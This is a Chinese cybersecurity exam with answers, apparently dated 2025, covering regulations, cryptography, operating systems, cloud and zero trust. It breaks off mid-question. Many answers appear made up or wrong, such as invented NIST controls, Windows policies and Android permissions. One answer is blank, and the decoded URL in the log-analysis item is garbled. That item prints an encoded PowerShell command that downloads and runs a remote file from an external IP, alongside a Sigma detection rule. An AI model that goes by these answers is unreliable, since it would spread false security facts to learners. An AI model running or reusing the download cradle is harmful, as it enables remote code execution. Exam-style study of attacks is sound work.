2025年网络安全常识试题及答案解析

2025年网络安全常识试题及答案解析一、单项选择题（每题1分，共30分。每题只有一个正确答案，请将正确选项字母填入括号内）1.2025年1月1日起正式施行的《数据跨境流动安全管理办法》中，对“重要数据”出境实行（）A.备案制B.评估制C.许可制D.自由流动制答案：C解析：办法第7条明确，重要数据出境须通过省级以上网信部门安全评估并取得许可。2.在零信任架构中，用于动态评估访问主体信任等级的核心组件是（）A.SIEMB.SDPC.PKID.TrustEngine答案：D解析：TrustEngine依据多源信号实时计算信任分数，是零信任策略引擎的核心。3.某企业使用TLS1.3协议，默认启用的对称加密算法为（）A.3DESB.AES128GCMC.RC4D.IDEA答案：B解析：TLS1.3仅保留AEAD算法，AES128GCM为默认套件之一。4.2025年主流浏览器针对Cookie新增的“分区存储”机制，主要防御的攻击是（）A.SQL注入B.CSRFC.跨站跟踪D.缓冲区溢出答案：C解析：分区存储（CHIPS）将Cookie按顶级站点隔离，阻断跨站跟踪。5.依据《个人信息保护法》，处理敏感个人信息时，除告知同意外，还需取得（）A.书面同意B.口头同意C.单独同意D.默示同意答案：C解析：第29条要求“单独同意”，即一次性不捆绑的明示同意。6.在Linux内核5.19及以上版本，启用“内核实时修补”功能需加载的模块是（）A.kpatchB.livepatchC.kspliceD.kGraft答案：B解析：livepatch为内核主线内置，RedHat、Ubuntu均默认集成。7.2025年Q1爆发的“BlackLotus”UEFIbootkit主要绕过哪项安全机制（）A.SecureBootB.TPMC.SGXD.TXT答案：A解析：BlackLotus通过伪造合法证书链，关闭SecureBoot实现持久化。8.使用SM4算法加密8KB数据，CBC模式下所需填充最大字节数为（）A.8B.16C.32D.0答案：B解析：SM4块大小16字节，CBC需PKCS7填充，最大填充16字节。9.在IPv6网络中，用于防止ND欺骗的官方推荐机制是（）A.RAGuardB.DHCPv6GuardC.SENDD.SAVI答案：C解析：SEND（RFC3971）通过CGAs与RSA签名保护邻居发现。10.2025年新版《网络安全等级保护测评要求》中，四级系统要求“云服务商”至少通过（）A.等保三级测评B.等保四级测评C.ISO27001D.CSASTARGold答案：B解析：四级业务系统上云，其云基础设施须通过等保四级测评。11.在Windows1124H2中，默认阻止Office宏运行的策略名称是（）A.ASRB.VBAKillbitC.BlockUntrustedMacrosD.MacroIsolation答案：C解析：组策略“BlockUntrustedMacros”默认开启，阻断互联网宏。12.使用Wireshark过滤“TLS握手失败”报文，正确的显示过滤器是（）A.tls.alert.level==2B.tcp.flags.reset==1C.tls.handshake.type==1D.http.response.code==503答案：A解析：alert.level==2表示致命错误，常伴随握手失败。13.2025年NIST发布的《后量子密码过渡路线图》建议，优先替换的算法是（）A.RSA4096B.ECDHP384C.AES256D.SHA384答案：B解析：ECDH/ECDSA基于椭圆曲线，易受量子Shor算法攻击，优先级最高。14.在Kubernetes1.30中，启用“镜像签名验证”功能需使用的CRD是（）A.ImagePolicyWebhookB.CosignPolicyC.SigstoreVerifierD.Kyverno答案：D解析：Kyverno1.12内置verifyImages规则，支持Cosign签名验证。15.某APT组织利用“LivingofftheLand”技术，最可能滥用的Windows工具是（）A.calc.exeB.mshta.exeC.notepad.exeD.mspaint.exe答案：B解析：mshta.exe可执行HTA脚本，常被用于无文件攻击。16.2025年工信部对APP收集“加速度传感器”信息的最小必要场景认定为（）A.计步B.广告归因C.用户画像D.崩溃统计答案：A解析：工信部〔2025〕15号文明确，加速度传感器最小必要场景仅限运动健康。17.在AWSS3中，阻止任何用户（包括根账户）删除存储桶的防护机制是（）A.MFADelete+BucketPolicyB.ObjectLockGovernanceC.S3BlockPublicAccessD.AWSConfigRule答案：A解析：MFADelete结合拒绝删除的BucketPolicy，可实现根账户也无法删除。18.2025年主流EDR产品检测“进程空心化”最常用的遥测事件是（）A.SysmonEventID10B.ETW“ProcessHollowing”C.WindowsEvent4688D.AMSIScanResult答案：B解析：ETW（EventTracingforWindows）提供进程空心化专用事件。19.在Android15中，限制“后台应用启动前台服务”的新权限是（）A.START_FOREGROUNDB.FOREGROUND_SERVICE_SPECIALC.RUN_ANY_IN_BACKGROUNDD.START_ACTIVITIES_FROM_BACKGROUND答案：B解析：FOREGROUND_SERVICE_SPECIAL为Android15新增受限权限。20.2025年欧盟NIS2指令对“基础实体”最高罚款可达全球年营业额（）A.1%B.2%C.3%D.5%答案：B解析：NIS2第34条，最高罚款2%。21.在SSL/TLS流量检测中，用于识别“ESNI”字段的Wireshark关键字是（）A.tls.handshake.extensions_server_nameB.tls.handshake.extensions_esniC.dns.quicD.http.host答案：B解析：ESNI（EncryptedSNI）扩展类型为0xffce，Wireshark解析为esni。22.2025年国内首个通过商用密码产品认证二级要求的同态加密库是（）A.HElibB.SEALC.华为KunpengHED.阿里TuGraphHE答案：C解析：华为KunpengHE2025年3月获国密局二级认证。23.在Linux中，启用“内核锁定”模式阻止内核模块加载，应使用的命令是（）A.sysctlkernel.kptr_restrict=2B.echo1>/proc/sys/kernel/modules_disabledC.mountoremount,ro/D.echolock>/sys/power/state答案：B解析：modules_disabled=1后无法加载新模块，需重启恢复。24.2025年Q2爆发的“RansomCloud”新型勒索软件主要加密目标是（）A.本地磁盘MBRB.云对象存储C.BIOS固件D.网络交换机配置答案：B解析：RansomCloud通过泄露的AK/SK直接加密S3/OSS桶。25.在Windows11“智能应用控制”（SAC）中，阻止未知程序运行的核心数据库是（）A.WDACB.SmartScreenCloudC.ISGCatalogD.AppLocker答案：C解析：ISG（IntelligentSecurityGraph）Catalog实时更新信誉。26.2025年NISTSP80053r6新增控制项“SC51”要求防御（）A.深度伪造B.供应链投毒C.AI模型窃取D.量子破解答案：A解析：SC51DeepfakeDetection要求检测合成音视频。27.在iOS18中，针对“侧载应用”的签名验证机制称为（）A.AppNotarizationB.CoreTrustC.MobileDevicePairingD.TCC答案：B解析：CoreTrust验证侧载应用开发者证书与公证票据。28.2025年主流云厂商提供的“机密计算”实例，其TEE基于（）A.SGXB.SEVSNPC.TDXD.TrustZone答案：C解析：第四代Xeon引入TDX（TrustDomainExtensions），2025年全面商用。29.在Git2.45中，默认开启的“安全目录”机制，阻止克隆的路径是（）A.含NTFSAlternateDataStreamsB.属主非当前用户C.全局可写D.含非ASCII字符答案：C解析：CVE202432002补丁，拒绝全局可写目录下的克隆。30.2025年国内《汽车数据安全管理若干规定》要求，重要数据出境需通过（）A.工信部评估B.国家网信部门评估C.公安部备案D.车企自评答案：B解析：规定第9条，重要汽车数据出境由网信部门安全评估。二、多项选择题（每题2分，共20分。每题有两个或两个以上正确答案，多选、少选、错选均不得分）31.以下哪些属于2025年MITREATT&CKv15新增“容器矩阵”技术？（）A.ContainerDaemonEscapeB.StaticPodCreationC.SidecarInjectionD.ImagePullBackOff答案：ABC解析：D为Kubernetes事件，非攻击技术。32.关于DNSoverHTTPS（DoH）的正确描述包括（）A.默认端口443B.可基于HTTP/3C.查询可见明文D.需TLS证书答案：ABD解析：DoH查询经TLS加密，不可见明文。33.2025年主流EDR使用的“行为阻断”技术依赖的Windows子系统有（）A.AMSIB.WDAGC.ETWD.VBS答案：ACD解析：WDAG为应用隔离，非行为阻断直接依赖。34.以下哪些算法已被NIST正式列为后量子签名标准（2025年8月发布）？（）A.CRYSTALSDilithiumB.FalconC.SPHINCS+D.Rainbow答案：ABC解析：Rainbow未被选中。35.在Android15“隐私沙箱”中，限制广告跟踪的新技术包括（）A.TopicsAPIB.AttributionReportingC.FLEDGED.GAID答案：ABC解析：GAID将被淘汰。36.2025年国内《生成式AI服务管理暂行办法》要求提供者履行的义务有（）A.训练数据合法来源B.模型备案C.输出标识D.用户实名答案：ABCD解析：办法第4、8、11、13条。37.以下哪些属于Linux内核“现场修补”技术？（）A.kpatchB.livepatchC.kspliceD.ftrace答案：ABC解析：ftrace为跟踪，非修补。38.在零信任网络中，用于“微分段”的协议或技术有（）A.SDPB.VLANC.SGTD.VXLANGateway答案：AC解析：VLAN/VXLAN为网络隔离，非零信任微分段。39.2025年主流浏览器支持的“防钓鱼”技术包括（）A.SafeBrowsingAPIv5B.CertificateTransparencyC.EV证书绿条D.客户端ML模型答案：ABD解析：EV绿条已被Chrome取消。40.以下哪些属于《数据安全法》规定的企业“数据处理”活动？（）A.收集B.存储C.删除D.传输答案：ABCD解析：第3条定义涵盖全生命周期。三、填空题（每空1分，共20分）41.2025年NIST发布的后量子密钥封装算法标准名称是________。答案：CRYSTALSKYBER42.在Windows11中，用于隔离Edge浏览器敏感进程的容器技术简称________。答案：WDAG（WindowsDefenderApplicationGuard）43.2025年国内《个人信息出境标准合同办法》规定，自主评估报告保存期限不少于________年。答案：344.在Linux中，查看BPF程序是否加载的命令是________。答案：bpftoolproglist45.2025年主流云厂商提供的“机密容器”实例，其TEE基于CPU的扩展指令集________。答案：SEVSNP（AMD）或TDX（Intel），答任一即给分。46.在Android15中，限制后台应用访问“已安装应用列表”的新权限是________。答案：QUERY_ALL_PACKAGES47.2025年MITREATT&CK“容器矩阵”中，用于横向移动的技术“ContainerAPISocket”对应的战术是________。答案：LateralMovement48.在TLS1.3中，用于实现0RTT重放的扩展名称是________。答案：EarlyData49.2025年国内《汽车数据安全管理若干规定》要求，重要数据境内存储期限不少于________年。答案：150.在iOS18中，用于侧载应用签名验证的组件名称是________。答案：CoreTrust51.2025年欧盟《数据治理法案》提出的“数据利他主义”组织需登记于________。答案：国家数据利他组织注册簿（NationalRegisterofDataAltruismOrganizations）52.在Kubernetes1.30中，用于限制容器系统调用的安全策略对象简称________。答案：SecProfile（或SeccompProfile，答Seccomp亦给分）53.2025年主流EDR检测“无文件攻击”依赖的Windows事件通道名称________。答案：MicrosoftWindowsSysmon/Operational54.在SSL/TLS中，用于通知对端关闭连接的告警类型值是________。答案：close_notify（1）55.2025年国内《商用密码产品认证规则》将安全等级划分为________级。答案：三56.在Linux中，启用“内核锁定”后，无法修改的sysctl参数前缀是________。答案：kernel.kexec57.2025年NISTSP80063B要求，多因素认证中“持有因子”最小长度为________位。答案：112（熵值，约等于160位二进制）58.在AWS中，用于阻止S3桶公共访问的IAM条件键是________。答案：s3:xamzacl59.2025年主流浏览器支持“防钓鱼”的客户端ML模型文件名________。答案：SafeBrowsingMLModel（或chrome_ml.pb，答核心意思即给分）60.在Windows11“智能应用控制”中，用于提交未知文件信誉的云端服务域名________。答案：四、简答题（每题6分，共30分）61.简述2025年新版《网络安全等级保护测评要求》四级系统对“云原生微服务”提出的三项新增控制点。答案与解析：（1）镜像供应链完整性验证：要求所有容器镜像须通过签名验证（Cosign/Sigstore），并记录哈希值至不可篡改日志。（2）微服务间mTLS强制双向认证：东西向流量全部启用SPIFFEID，证书有效期≤24h，自动轮转。（3）运行时行为基线：基于eBPF监控syscall序列，偏离基线>15%触发阻断并审计。62.说明“DNSoverHTTPS”与传统“DNSoverUDP”在隐私保护方面的两点主要差异。答案与解析：（1）加密性：DoH基于HTTPS/TLS，查询与响应全程加密，中间人无法获知域名；传统UDP53明文传输。（2）流量混淆：DoH与Web流量共用443端口，难以被基于端口的策略识别；UDP53易被防火墙记录或劫持。63.概述“零信任网络”中“持续信任评估”引擎的四个输入维度。答案与解析：（1）身份信号：用户、设备、服务的实时身份凭证与生命周期状态。（2）环境信号：网络位置、时间、地理位置、威胁情报匹配度。（3）行为信号：访问频率、数据量、异常模式（如首次下载大量数据）。（4）资产信号：设备健康度（补丁、EDR评分）、证书有效性、硬件根信任度量。64.列举《个人信息保护法》对“自动化决策”提出的三项合规义务。答案与解析：（1）透明度：向个人告知自动化决策的存在、逻辑及影响。（2）拒绝权：个人有权拒绝仅通过自动化决策作出的重大决定。（3）评估与记录：事前进行个人信息保护影响评估，并保存记录至少三年。65.说明“机密计算”与“传统加密存储”在数据保护阶段的差异。答案与解析：传统加密存储保护“静态数据”（DataatRest），磁盘或对象存储加密，内存中明文；机密计算通过TEE保护“使用中数据”（DatainUse），内存中保持加密，CPU内部解密，攻击者即使获取宿主机内核权限也无法读取明文。五、应用题（共50分）66.计算分析题（10分）某企业使用AES256GCM加密每日备份，备份大小为500GB，网络带宽1Gbps，CPU为IntelXeonGold6330（单核AES指令吞吐1.8GB/s）。（1）计算在CPU单核加密模式下，完成500GB加密所需最短时间（秒）。（2）若启用硬件加速卡（吞吐10GB/s），计算加密时间。（3）指出影响实际耗时的两项非计算因素。答案：（1）t1=500/1.8≈277.8s（2）t2=500/10=50s（3）磁盘I/O延迟、网络传输延迟（或内存带宽、上下文切换，答任意两项即给分）。67.日志分析题（10分）给出一段WindowsSysmon日志（EventID1）关键字段：CommandLine:powershellencSQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMQAuADQANAAuADEAMgA2AC4AMQAwADUALwB0AC4AZQBiAHUAeQAnACkAParentImage:C:\Users\Public\a.exe（1）指出该行为的攻击阶段（MITRE战术）。（2）解码后给出下载URL。（3）给出两条检测规则（Sigma或Yara均可）。答案：（1）Execution/CommandandScriptingInterpreter（2）05/t.ebuy（3）Sigma示例：title:SuspiciousPowerShellDownloadlogsource:product:windowscategory:process_creationdetection:selection:CommandLine|contains|all:'powershell''downloadstring'condition:selectionlevel:high68.应急响应题（10分）某电商云原生集群发现异常Pod（image:nginx:latest，实际运行挖矿程序），集群使用containerd运行时，网络插件为Cilium。（1）写出立即隔离该Pod的kube